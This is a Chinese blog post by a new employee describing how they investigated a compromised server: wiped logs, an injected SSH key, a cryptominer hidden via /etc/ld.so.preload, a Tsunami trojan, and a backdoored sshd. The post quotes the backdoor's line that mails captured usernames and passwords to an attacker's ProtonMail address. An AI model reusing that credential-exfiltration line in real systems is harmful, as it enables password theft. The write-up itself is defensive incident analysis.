与入侵者的斗争

刚入职新公司,听同事说过公司有服务器中过挖矿病毒,当时没有特别在意

文中出现的xxx 和 yyy 都是在打赛克

1. 初次接触

日期:x月15日

早上收到服务器报警,提示/etc/passwd文件被修改。

登录服务器出现host key被修改提示;
检查服务器上last和history 记录被清空;
/var/log/secure被清空;
/var/log/messages被清空;
.ssh/authorized_keys 被新增未知 pub key。

基于以上判断:服务器被入侵了。

采取措施:

  • 修改了涉及所有服务器的密码
  • 清除了ssh pub key
  • 检查异常进程(未发现)
  • 检查定时任务(未发现)

2. 发现cpu利用率高

日期:x月20日

发现多个服务器cpu usr利用率 长期90%以上。

  • 检查进程,却未发现占用cpu高的进程;
  • 检查网络连接,发现一个异常连接,但是没有对应pid ;
ESTAB      0      0      10.3.x.x:48002              1xx.2xx.1xx.1xx:443 
  • 怀疑是中了挖矿病毒程序,并隐藏了进程;
  • 从正常服务器上复制 ps netstat等命令文件到此服务器上,执行后仍无法查看到进程;
  • 发现服务器文件/etc/ld.so.preload,该文件加载了某个异常的so文件,会导致服务器命令(ps\netstat\top )无法查看到挖矿进程,删除该文件;
  • 重新查看进程,发现挖矿进程为 ‘wipefs’、手动kill掉该进程,cpu利用率恢复
 ps -ef |grep wipefs
root      7025     1 99 Xxx 15 ?        19-10:42:00 /usr/lib64/-l/.db/wipefs --library-path /usr/lib64/-l/.db /usr/lib64/-l/.db/x

3. 获取密码

日期:x+1月7日

又发现服务器运行了挖矿程序wipefs

  • 检查服务器日志发现相关信息再次被清除
  • 从一个被遗漏的messages日志中,发现其控制了某个测试服务器作为跳板
  • 日志文件中记录登录方式是密码,一次性成功(好奇怪啊,没有暴力破解)
  • 考虑到事情比较严重,部署了安全监测脚本
  • 从扫描的结果来看
usr/lib/httpds: Win.Trojan.Tsunami-5 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6677493
Engine version: 0.100.1
Scanned directories: 11867
Scanned files: 95647
Infected files: 1
Data scanned: 7709.03 MB
Data read: 34049.43 MB (ratio 0.23:1)
Time: 3318.450 sec (55 m 18 s)
---------------------- Start Rootkit Hunter Scan ----------------------
Warning: Package manager verification has failed:
        File: /usr/sbin/sshd
        The file hash value has changed
        The file size has changed
        The file modification time has changed
Warning: Package manager verification has failed:
        File: /usr/bin/ssh
        The file hash value has changed
        The file size has changed
        The file modification time has changed
  1. 中了木马病毒,同时发现对应cron job和进程
  2. ssh和sshd都被修改
  • 进一步分析sshd的行为:strace -p <sshd pid >,然后测试使用用户名和密码登录
# 发现其有调用mail 发送邮件
echo pass_from: 10.3.x.x user:  xxx pass: yyyy |mail -s "Salut sefu, am moutati" linuxxxxx@protonmail.com

这就找到了为什么密码没有暴力破解就被获取到了(此前一度怀疑公司有内鬼,当然现在也没排除这个可能)

那么protonmail.com邮箱到底是怎么样的邮箱系统呢?
从官方介绍来看,摘取如下两点:
ProtonMail is incorporated in Switzerland and all our servers are located in Switzerland. This means all user data is protected by strict Swiss privacy laws.
No personal information is required to create your secure email account. By default, we do not keep any IP logs which can be linked to your anonymous email account. Your privacy comes first.
基本上可以认定为入侵者的必备邮件系统,网上也可查询到有的勒索病毒也使用此邮箱。

参考文档
https://sysdig.com/blog/hiding-linux-processes-for-fun-and-profit/
https://paper.seebug.org/629/

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,456评论 5 477
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,370评论 2 381
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,337评论 0 337
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,583评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,596评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,572评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,936评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,595评论 0 258
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,850评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,601评论 2 321
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,685评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,371评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,951评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,934评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,167评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 43,636评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,411评论 2 342

推荐阅读更多精彩内容